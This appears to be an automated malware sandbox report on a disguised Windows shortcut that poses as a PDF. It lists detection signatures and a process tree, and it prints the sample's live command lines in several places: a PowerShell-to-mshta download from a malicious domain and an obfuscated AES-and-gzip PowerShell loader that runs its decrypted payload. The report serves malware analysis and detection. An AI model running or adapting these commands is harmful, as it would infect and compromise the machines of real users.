Edit tour

Windows Analysis Report
filepdf.pdf.lnk.download.lnk

Overview

General Information

Sample name:	filepdf.pdf.lnk.download.lnk
Analysis ID:	1560897
MD5:	25840bfeb06a9efbd1494278daf47d51
SHA1:	30379cfd8c42b5f9e4fc8bf5515fd7aca444fe96
SHA256:	a06aa1b7dae18601bae1fe1d840fcd0cfd8198d7ae12e29214eccc3bcd082a1c
Tags:	lnkukr-netdigitalhub--prouser-JAMESWT_MHT
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Windows shortcut file (LNK) starts blacklisted processes

Yara detected Powershell download and execute

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Powershell drops PE file

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Potential PowerShell Command Line Obfuscation

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Suspicious MSHTA Child Process

Suspicious powershell command line found

Uses an obfuscated file name to hide its real file extension (double extension)

Windows shortcut file (LNK) contains suspicious command line arguments

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to detect virtual machines (SLDT)

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evaded block containing many API calls

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Gzip Archive Decode Via PowerShell

Sigma detected: Use Short Name Path in Command Line

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Process Tree

System is w10x64

powershell.exe (PID: 7312 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')http://ukr-netdigitalhub.pro/x64dbg2 MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mshta.exe (PID: 7812 cmdline: "C:\Windows\system32\mshta.exe" http://ukr-netdigitalhub.pro/x64dbg2 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 8120 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $eoXTm = 'AAAAAAAAAAAAAAAAAAAAAOhRfbfB0Z9oGAoMOSgiWW1szkJpy8tdpzZDtTrcpHQQScNLpta757CP3/Lp9GzqMSWF/7chhFbpK5jnKm5l5GflMVIeicKnQ3tCZoPwc82rCUKi+CN+28+YgJKXEr7fHV7bfPtkkKl/IfCV5knblgZoHjLo4alPfj3vVP9+W9dBhO1jttLCgLMu7VdweZbJhA9uHOeLEKlpTmwZhy6SBRt+2wZEQ+dEohArTgBqoSvdX1qI7jixQKp5YBiIhsJS7u1Qvr/smE9NMnRlLj8eZrE59UY+w09WbevvaCeXh61O6h2aDTpepoYId9+yEwU1DPB0GqmbzCA9QdOulsJz6fVjaGogYMrT5S7XHNY3b3K8Fds6PLI9RHngZogzd88E91dJ6Cp8l8L/0YhXqmbYzQWWtalFkji34QstydprFtIIkBj5NVpQsyMwuAirXLzRAYWUXfeXCL3bsXMbhndHMmjL5UIxljin3QbIc2iew7JoG9NPIrW1cJfuakC0Y/jFAEgey3tAySeNXUsyn3/Kdn7oJodxLIwRjwHaRO3ZSEvHxH3ar969bzsawhe34Ij3+d5OxiDnJyriW04WUQmnSpB1IiiK4H4ozAiv0sv12aPGF8M5NRhzJu5xw+dCgvgsCfFx1DUJKwQ45ufm9okusl0jpVx/O+uTL+C+FQgu6Pua4CqcOdudMNHchFijnXMID9n3adXAQrcb1tSG8Brkp0jI3sJ2d3eDgc5ERd3aZTVLrVW9YlDfWNKaNDKY0xTYJy2El0nQ1GJXLH9ZEqQjU5MWZDkryrQ2MJMkbIoRuofhdgf1Lbm0S6cGLVrPnryhnI9zO+hc3RM1f3C+NWNNFesGiRNQ8BKhRbBeJPuKvNyofEthadpJdc7RwBzuvcVrz8PfmhSwy+CNbj+mIRYU9mFJiv9fT4YKiVpQsGiZxKUu';$kPWuaVGM = 'Y1ZpbW5aY0ZUT2xpV0ZVd2FHbGNzS0Z6b2hBSHN5ZVg=';$gnuKIz = New-Object 'System.Security.Cryptography.AesManaged';$gnuKIz.Mode = [System.Security.Cryptography.CipherMode]::ECB;$gnuKIz.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$gnuKIz.BlockSize = 128;$gnuKIz.KeySize = 256;$gnuKIz.Key = [System.Convert]::FromBase64String($kPWuaVGM);$hGgdN = [System.Convert]::FromBase64String($eoXTm);$RaRaLJdR = $hGgdN[0..15];$gnuKIz.IV = $RaRaLJdR;$jhyJONfqz = $gnuKIz.CreateDecryptor();$ugCNpUbNf = $jhyJONfqz.TransformFinalBlock($hGgdN, 16, $hGgdN.Length - 16);$gnuKIz.Dispose();$mNOLJITf = New-Object System.IO.MemoryStream( , $ugCNpUbNf );$pvQGtgpn = New-Object System.IO.MemoryStream;$AjWBPWyhL = New-Object System.IO.Compression.GzipStream $mNOLJITf, ([IO.Compression.CompressionMode]::Decompress);$AjWBPWyhL.CopyTo( $pvQGtgpn );$AjWBPWyhL.Close();$mNOLJITf.Close();[byte[]] $AeGlbG = $pvQGtgpn.ToArray();$qNgJt = [System.Text.Encoding]::UTF8.GetString($AeGlbG);$qNgJt | powershell - MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1836 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" - MD5: 04029E121A0CFA5991749937DD22A1D9)

Acrobat.exe (PID: 7100 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user~1\AppData\Local\Temp\x64dbg.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)

AcroCEF.exe (PID: 7316 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

AcroCEF.exe (PID: 1624 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2080 --field-trial-handle=1636,i,4196166615236883836,1689769362515970507,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

WmiPrvSE.exe (PID: 6396 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

putty.exe (PID: 5260 cmdline: "C:\Users\user~1\AppData\Local\Temp\putty.exe" MD5: 5EFEF6CC9CD24BAEEED71C1107FC32DF)

svchost.exe (PID: 8000 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: powershell.exe PID: 8120	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 8120	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x45d5a:$b1: ::WriteAllBytes( 0xbde86:$b1: ::WriteAllBytes( 0xbe498:$b1: ::WriteAllBytes( 0xdd11a:$b1: ::WriteAllBytes( 0x121845:$b1: ::WriteAllBytes( 0x2cfb:$b2: ::FromBase64String( 0x2d32:$b2: ::FromBase64String( 0x3662:$b2: ::FromBase64String( 0x3699:$b2: ::FromBase64String( 0xc5b3:$b2: ::FromBase64String( 0xc5e8:$b2: ::FromBase64String( 0xcd65:$b2: ::FromBase64String( 0xcd9a:$b2: ::FromBase64String( 0xde69c:$b2: ::FromBase64String( 0xde6d2:$b2: ::FromBase64String( 0xe766a:$b2: ::FromBase64String( 0xe76a1:$b2: ::FromBase64String( 0x138d8e:$b2: ::FromBase64String( 0x138dc3:$b2: ::FromBase64String( 0x139540:$b2: ::FromBase64String( 0x139575:$b2: ::FromBase64String(
Process Memory Space: powershell.exe PID: 1836	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 1836	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xdc7ed:$b1: ::WriteAllBytes( 0x7df9b:$s1: -join 0x7e614:$s1: -join 0xd6cd5:$s1: -join 0x11ddf0:$s1: -join 0x12aec5:$s1: -join 0x12e297:$s1: -join 0x12e949:$s1: -join 0x13043a:$s1: -join 0x132640:$s1: -join 0x132e67:$s1: -join 0x1336d7:$s1: -join 0x133e12:$s1: -join 0x133e44:$s1: -join 0x133e8c:$s1: -join 0x133eab:$s1: -join 0x1346fb:$s1: -join 0x134877:$s1: -join 0x1348ef:$s1: -join 0x134982:$s1: -join 0x134be8:$s1: -join

Other

Source	Rule	Description	Author	Strings
amsi64_1836.amsi.csv	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xc049:$b1: ::WriteAllBytes( 0xbcbc:$s1: -join 0x5468:$s4: += 0x552a:$s4: += 0x9751:$s4: += 0xb86e:$s4: += 0xbb58:$s4: += 0xbc9e:$s4: += 0x6649a:$s4: += 0x6651a:$s4: += 0x665e0:$s4: += 0x66660:$s4: += 0x66836:$s4: += 0x668ba:$s4: += 0xc940:$e4: Get-WmiObject 0xcb2f:$e4: Get-Process 0xcb87:$e4: Start-Process

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $eoXTm = 'AAAAAAAAAAAAAAAAAAAAAOhRfbfB0Z9oGAoMOSgiWW1szkJpy8tdpzZDtTrcpHQQScNLpta757CP3/Lp9GzqMSWF/7chhFbpK5jnKm5l5GflMVIeicKnQ3tCZoPwc82rCUKi+CN+28+YgJKXEr7fHV7bfPtkkKl/IfCV5knblgZoHjLo4alPfj3vVP9+W9dBhO1jttLCgLMu7VdweZbJhA9uHOeLEKlpTmwZhy6SBRt+2wZEQ+dEohArTgBqoSvdX1qI7jixQKp5YBiIhsJS7u1Qvr/smE9NMnRlLj8eZrE59UY+w09WbevvaCeXh61O6h2aDTpepoYId9+yEwU1DPB0GqmbzCA9QdOulsJz6fVjaGogYMrT5S7XHNY3b3K8Fds6PLI9RHngZogzd88E91dJ6Cp8l8L/0YhXqmbYzQWWtalFkji34QstydprFtIIkBj5NVpQsyMwuAirXLzRAYWUXfeXCL3bsXMbhndHMmjL5UIxljin3QbIc2iew7JoG9NPIrW1cJfuakC0Y/jFAEgey3tAySeNXUsyn3/Kdn7oJodxLIwRjwHaRO3ZSEvHxH3ar969bzsawhe34Ij3+d5OxiDnJyriW04WUQmnSpB1IiiK4H4ozAiv0sv12aPGF8M5NRhzJu5xw+dCgvgsCfFx1DUJKwQ45ufm9okusl0jpVx/O+uTL+C+FQgu6Pua4CqcOdudMNHchFijnXMID9n3adXAQrcb1tSG8Brkp0jI3sJ2d3eDgc5ERd3aZTVLrVW9YlDfWNKaNDKY0xTYJy2El0nQ1GJXLH9ZEqQjU5MWZDkryrQ2MJMkbIoRuofhdgf1Lbm0S6cGLVrPnryhnI9zO+hc3RM1f3C+NWNNFesGiRNQ8BKhRbBeJPuKvNyofEthadpJdc7RwBzuvcVrz8PfmhSwy+CNbj+mIRYU9mFJiv9fT4YKiVpQsGiZxKUu';$kPWuaVGM = 'Y1ZpbW5aY0ZUT2xpV0ZVd2FHbGNzS0Z6b2hBSHN5ZVg=';$gnuKIz = New-Object 'System.Security.Cryptography.AesManaged';$gnuKIz.Mode = [System.Security.Cryptography.CipherMode]::ECB;$gnuKIz.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$gnuKIz.BlockSize = 128;$gnuKIz.KeySize = 256;$gnuKIz.Key = [System.Convert]::FromBase64String($kPWuaVGM);$hGgdN = [System.Convert]::FromBase64String($eoXTm);$RaRaLJdR = $hGgdN[0..15];$gnuKIz.IV = $RaRaLJdR;$jhyJONfqz = $gnuKIz.CreateDecryptor();$ugCNpUbNf = $jhyJONfqz.TransformFinalBlock($hGgdN, 16, $hGgdN.Length - 16);$gnuKIz.Dispose();$mNOLJITf = New-Object System.IO.MemoryStream( , $ugCNpUbNf );$pvQGtgpn = New-Object System.IO.MemoryStream;$AjWBPWyhL = New-Object System.IO.Compression.GzipStream $mNOLJITf, ([IO.Compression.CompressionMode]::Decompress);$AjWBPWyhL.CopyTo( $pvQGtgpn );$AjWBPWyhL.Close();$mNOLJITf.Close();[byte[]] $AeGlbG = $pvQGtgpn.ToArray();$qNgJt = [System.Text.Encoding]::UTF8.GetString($AeGlbG);$qNgJt | powershell -, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $eoXTm = 'AAAAAAAAAAAAAAAAAAAAAOhRfbfB0Z9oGAoMOSgiWW1szkJpy8tdpzZDtTrcpHQQScNLpta757CP3/Lp9GzqMSWF/7chhFbpK5jnKm5l5GflMVIeicKnQ3tCZoPwc82rCUKi+CN+28+YgJKXEr7fHV7bfPtkkKl/IfCV5knblgZoHjLo4alPfj3vVP9+W9dBhO1jttLCgLMu7VdweZbJhA9uHOeLEKlpTmwZhy6SBRt+2wZEQ+dEohArTgBqoSvdX1qI7jixQKp5YBiIhsJS7u1Qvr/smE9NMnRlLj8eZrE59UY+w09WbevvaCeXh61O6h2aDTpepoYId9+yEwU1DPB0GqmbzCA9QdOulsJz6fVjaGogYMrT5S7XHNY3b3K8Fds6PLI9RHngZogzd88E91dJ6Cp8l8L/0YhXqmbYzQWWtalFkji34QstydprFtIIkBj5NVpQsyMwuAirXLzRAYWUXfeXCL3bsXMbhndHMmjL5UIxljin3QbIc2iew7JoG9NPIrW1cJfuakC0Y/jFAEgey3tAySeNXUsyn3/Kdn7oJodxLIwRjwHaRO3ZSEvHxH3ar969bzsawhe34Ij3+d5OxiDnJyriW04WUQmnSpB1IiiK4H4ozAiv0sv12aPGF8M5NRhzJu5xw+dCgvgsCfFx1DUJKwQ45ufm9okusl0jpVx/O+uTL+C+FQgu6Pua4CqcOdudMNHchFijnXMID9n3adXAQrcb1tSG8Brkp0jI3sJ2d3eDgc5ERd3aZTVLrVW9YlDfWNKaNDKY0xTYJy2El0nQ1GJXLH9ZEqQjU5MWZD

Sigma detected: Potential PowerShell Command Line Obfuscation

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $eoXTm = 'AAAAAAAAAAAAAAAAAAAAAOhRfbfB0Z9oGAoMOSgiWW1szkJpy8tdpzZDtTrcpHQQScNLpta757CP3/Lp9GzqMSWF/7chhFbpK5jnKm5l5GflMVIeicKnQ3tCZoPwc82rCUKi+CN+28+YgJKXEr7fHV7bfPtkkKl/IfCV5knblgZoHjLo4alPfj3vVP9+W9dBhO1jttLCgLMu7VdweZbJhA9uHOeLEKlpTmwZhy6SBRt+2wZEQ+dEohArTgBqoSvdX1qI7jixQKp5YBiIhsJS7u1Qvr/smE9NMnRlLj8eZrE59UY+w09WbevvaCeXh61O6h2aDTpepoYId9+yEwU1DPB0GqmbzCA9QdOulsJz6fVjaGogYMrT5S7XHNY3b3K8Fds6PLI9RHngZogzd88E91dJ6Cp8l8L/0YhXqmbYzQWWtalFkji34QstydprFtIIkBj5NVpQsyMwuAirXLzRAYWUXfeXCL3bsXMbhndHMmjL5UIxljin3QbIc2iew7JoG9NPIrW1cJfuakC0Y/jFAEgey3tAySeNXUsyn3/Kdn7oJodxLIwRjwHaRO3ZSEvHxH3ar969bzsawhe34Ij3+d5OxiDnJyriW04WUQmnSpB1IiiK4H4ozAiv0sv12aPGF8M5NRhzJu5xw+dCgvgsCfFx1DUJKwQ45ufm9okusl0jpVx/O+uTL+C+FQgu6Pua4CqcOdudMNHchFijnXMID9n3adXAQrcb1tSG8Brkp0jI3sJ2d3eDgc5ERd3aZTVLrVW9YlDfWNKaNDKY0xTYJy2El0nQ1GJXLH9ZEqQjU5MWZDkryrQ2MJMkbIoRuofhdgf1Lbm0S6cGLVrPnryhnI9zO+hc3RM1f3C+NWNNFesGiRNQ8BKhRbBeJPuKvNyofEthadpJdc7RwBzuvcVrz8PfmhSwy+CNbj+mIRYU9mFJiv9fT4YKiVpQsGiZxKUu';$kPWuaVGM = 'Y1ZpbW5aY0ZUT2xpV0ZVd2FHbGNzS0Z6b2hBSHN5ZVg=';$gnuKIz = New-Object 'System.Security.Cryptography.AesManaged';$gnuKIz.Mode = [System.Security.Cryptography.CipherMode]::ECB;$gnuKIz.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$gnuKIz.BlockSize = 128;$gnuKIz.KeySize = 256;$gnuKIz.Key = [System.Convert]::FromBase64String($kPWuaVGM);$hGgdN = [System.Convert]::FromBase64String($eoXTm);$RaRaLJdR = $hGgdN[0..15];$gnuKIz.IV = $RaRaLJdR;$jhyJONfqz = $gnuKIz.CreateDecryptor();$ugCNpUbNf = $jhyJONfqz.TransformFinalBlock($hGgdN, 16, $hGgdN.Length - 16);$gnuKIz.Dispose();$mNOLJITf = New-Object System.IO.MemoryStream( , $ugCNpUbNf );$pvQGtgpn = New-Object System.IO.MemoryStream;$AjWBPWyhL = New-Object System.IO.Compression.GzipStream $mNOLJITf, ([IO.Compression.CompressionMode]::Decompress);$AjWBPWyhL.CopyTo( $pvQGtgpn );$AjWBPWyhL.Close();$mNOLJITf.Close();[byte[]] $AeGlbG = $pvQGtgpn.ToArray();$qNgJt = [System.Text.Encoding]::UTF8.GetString($AeGlbG);$qNgJt | powershell -, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $eoXTm = 'AAAAAAAAAAAAAAAAAAAAAOhRfbfB0Z9oGAoMOSgiWW1szkJpy8tdpzZDtTrcpHQQScNLpta757CP3/Lp9GzqMSWF/7chhFbpK5jnKm5l5GflMVIeicKnQ3tCZoPwc82rCUKi+CN+28+YgJKXEr7fHV7bfPtkkKl/IfCV5knblgZoHjLo4alPfj3vVP9+W9dBhO1jttLCgLMu7VdweZbJhA9uHOeLEKlpTmwZhy6SBRt+2wZEQ+dEohArTgBqoSvdX1qI7jixQKp5YBiIhsJS7u1Qvr/smE9NMnRlLj8eZrE59UY+w09WbevvaCeXh61O6h2aDTpepoYId9+yEwU1DPB0GqmbzCA9QdOulsJz6fVjaGogYMrT5S7XHNY3b3K8Fds6PLI9RHngZogzd88E91dJ6Cp8l8L/0YhXqmbYzQWWtalFkji34QstydprFtIIkBj5NVpQsyMwuAirXLzRAYWUXfeXCL3bsXMbhndHMmjL5UIxljin3QbIc2iew7JoG9NPIrW1cJfuakC0Y/jFAEgey3tAySeNXUsyn3/Kdn7oJodxLIwRjwHaRO3ZSEvHxH3ar969bzsawhe34Ij3+d5OxiDnJyriW04WUQmnSpB1IiiK4H4ozAiv0sv12aPGF8M5NRhzJu5xw+dCgvgsCfFx1DUJKwQ45ufm9okusl0jpVx/O+uTL+C+FQgu6Pua4CqcOdudMNHchFijnXMID9n3adXAQrcb1tSG8Brkp0jI3sJ2d3eDgc5ERd3aZTVLrVW9YlDfWNKaNDKY0xTYJy2El0nQ1GJXLH9ZEqQjU5MWZD

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" http://ukr-netdigitalhub.pro/x64dbg2, CommandLine: "C:\Windows\system32\mshta.exe" http://ukr-netdigitalhub.pro/x64dbg2, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')http://ukr-netdigitalhub.pro/x64dbg2, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7312, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" http://ukr-netdigitalhub.pro/x64dbg2, ProcessId: 7812, ProcessName: mshta.exe

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $eoXTm = 'AAAAAAAAAAAAAAAAAAAAAOhRfbfB0Z9oGAoMOSgiWW1szkJpy8tdpzZDtTrcpHQQScNLpta757CP3/Lp9GzqMSWF/7chhFbpK5jnKm5l5GflMVIeicKnQ3tCZoPwc82rCUKi+CN+28+YgJKXEr7fHV7bfPtkkKl/IfCV5knblgZoHjLo4alPfj3vVP9+W9dBhO1jttLCgLMu7VdweZbJhA9uHOeLEKlpTmwZhy6SBRt+2wZEQ+dEohArTgBqoSvdX1qI7jixQKp5YBiIhsJS7u1Qvr/smE9NMnRlLj8eZrE59UY+w09WbevvaCeXh61O6h2aDTpepoYId9+yEwU1DPB0GqmbzCA9QdOulsJz6fVjaGogYMrT5S7XHNY3b3K8Fds6PLI9RHngZogzd88E91dJ6Cp8l8L/0YhXqmbYzQWWtalFkji34QstydprFtIIkBj5NVpQsyMwuAirXLzRAYWUXfeXCL3bsXMbhndHMmjL5UIxljin3QbIc2iew7JoG9NPIrW1cJfuakC0Y/jFAEgey3tAySeNXUsyn3/Kdn7oJodxLIwRjwHaRO3ZSEvHxH3ar969bzsawhe34Ij3+d5OxiDnJyriW04WUQmnSpB1IiiK4H4ozAiv0sv12aPGF8M5NRhzJu5xw+dCgvgsCfFx1DUJKwQ45ufm9okusl0jpVx/O+uTL+C+FQgu6Pua4CqcOdudMNHchFijnXMID9n3adXAQrcb1tSG8Brkp0jI3sJ2d3eDgc5ERd3aZTVLrVW9YlDfWNKaNDKY0xTYJy2El0nQ1GJXLH9ZEqQjU5MWZDkryrQ2MJMkbIoRuofhdgf1Lbm0S6cGLVrPnryhnI9zO+hc3RM1f3C+NWNNFesGiRNQ8BKhRbBeJPuKvNyofEthadpJdc7RwBzuvcVrz8PfmhSwy+CNbj+mIRYU9mFJiv9fT4YKiVpQsGiZxKUu';$kPWuaVGM = 'Y1ZpbW5aY0ZUT2xpV0ZVd2FHbGNzS0Z6b2hBSHN5ZVg=';$gnuKIz = New-Object 'System.Security.Cryptography.AesManaged';$gnuKIz.Mode = [System.Security.Cryptography.CipherMode]::ECB;$gnuKIz.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$gnuKIz.BlockSize = 128;$gnuKIz.KeySize = 256;$gnuKIz.Key = [System.Convert]::FromBase64String($kPWuaVGM);$hGgdN = [System.Convert]::FromBase64String($eoXTm);$RaRaLJdR = $hGgdN[0..15];$gnuKIz.IV = $RaRaLJdR;$jhyJONfqz = $gnuKIz.CreateDecryptor();$ugCNpUbNf = $jhyJONfqz.TransformFinalBlock($hGgdN, 16, $hGgdN.Length - 16);$gnuKIz.Dispose();$mNOLJITf = New-Object System.IO.MemoryStream( , $ugCNpUbNf );$pvQGtgpn = New-Object System.IO.MemoryStream;$AjWBPWyhL = New-Object System.IO.Compression.GzipStream $mNOLJITf, ([IO.Compression.CompressionMode]::Decompress);$AjWBPWyhL.CopyTo( $pvQGtgpn );$AjWBPWyhL.Close();$mNOLJITf.Close();[byte[]] $AeGlbG = $pvQGtgpn.ToArray();$qNgJt = [System.Text.Encoding]::UTF8.GetString($AeGlbG);$qNgJt | powershell -, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $eoXTm = 'AAAAAAAAAAAAAAAAAAAAAOhRfbfB0Z9oGAoMOSgiWW1szkJpy8tdpzZDtTrcpHQQScNLpta757CP3/Lp9GzqMSWF/7chhFbpK5jnKm5l5GflMVIeicKnQ3tCZoPwc82rCUKi+CN+28+YgJKXEr7fHV7bfPtkkKl/IfCV5knblgZoHjLo4alPfj3vVP9+W9dBhO1jttLCgLMu7VdweZbJhA9uHOeLEKlpTmwZhy6SBRt+2wZEQ+dEohArTgBqoSvdX1qI7jixQKp5YBiIhsJS7u1Qvr/smE9NMnRlLj8eZrE59UY+w09WbevvaCeXh61O6h2aDTpepoYId9+yEwU1DPB0GqmbzCA9QdOulsJz6fVjaGogYMrT5S7XHNY3b3K8Fds6PLI9RHngZogzd88E91dJ6Cp8l8L/0YhXqmbYzQWWtalFkji34QstydprFtIIkBj5NVpQsyMwuAirXLzRAYWUXfeXCL3bsXMbhndHMmjL5UIxljin3QbIc2iew7JoG9NPIrW1cJfuakC0Y/jFAEgey3tAySeNXUsyn3/Kdn7oJodxLIwRjwHaRO3ZSEvHxH3ar969bzsawhe34Ij3+d5OxiDnJyriW04WUQmnSpB1IiiK4H4ozAiv0sv12aPGF8M5NRhzJu5xw+dCgvgsCfFx1DUJKwQ45ufm9okusl0jpVx/O+uTL+C+FQgu6Pua4CqcOdudMNHchFijnXMID9n3adXAQrcb1tSG8Brkp0jI3sJ2d3eDgc5ERd3aZTVLrVW9YlDfWNKaNDKY0xTYJy2El0nQ1GJXLH9ZEqQjU5MWZD

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $eoXTm = 'AAAAAAAAAAAAAAAAAAAAAOhRfbfB0Z9oGAoMOSgiWW1szkJpy8tdpzZDtTrcpHQQScNLpta757CP3/Lp9GzqMSWF/7chhFbpK5jnKm5l5GflMVIeicKnQ3tCZoPwc82rCUKi+CN+28+YgJKXEr7fHV7bfPtkkKl/IfCV5knblgZoHjLo4alPfj3vVP9+W9dBhO1jttLCgLMu7VdweZbJhA9uHOeLEKlpTmwZhy6SBRt+2wZEQ+dEohArTgBqoSvdX1qI7jixQKp5YBiIhsJS7u1Qvr/smE9NMnRlLj8eZrE59UY+w09WbevvaCeXh61O6h2aDTpepoYId9+yEwU1DPB0GqmbzCA9QdOulsJz6fVjaGogYMrT5S7XHNY3b3K8Fds6PLI9RHngZogzd88E91dJ6Cp8l8L/0YhXqmbYzQWWtalFkji34QstydprFtIIkBj5NVpQsyMwuAirXLzRAYWUXfeXCL3bsXMbhndHMmjL5UIxljin3QbIc2iew7JoG9NPIrW1cJfuakC0Y/jFAEgey3tAySeNXUsyn3/Kdn7oJodxLIwRjwHaRO3ZSEvHxH3ar969bzsawhe34Ij3+d5OxiDnJyriW04WUQmnSpB1IiiK4H4ozAiv0sv12aPGF8M5NRhzJu5xw+dCgvgsCfFx1DUJKwQ45ufm9okusl0jpVx/O+uTL+C+FQgu6Pua4CqcOdudMNHchFijnXMID9n3adXAQrcb1tSG8Brkp0jI3sJ2d3eDgc5ERd3aZTVLrVW9YlDfWNKaNDKY0xTYJy2El0nQ1GJXLH9ZEqQjU5MWZDkryrQ2MJMkbIoRuofhdgf1Lbm0S6cGLVrPnryhnI9zO+hc3RM1f3C+NWNNFesGiRNQ8BKhRbBeJPuKvNyofEthadpJdc7RwBzuvcVrz8PfmhSwy+CNbj+mIRYU9mFJiv9fT4YKiVpQsGiZxKUu';$kPWuaVGM = 'Y1ZpbW5aY0ZUT2xpV0ZVd2FHbGNzS0Z6b2hBSHN5ZVg=';$gnuKIz = New-Object 'System.Security.Cryptography.AesManaged';$gnuKIz.Mode = [System.Security.Cryptography.CipherMode]::ECB;$gnuKIz.Padding = 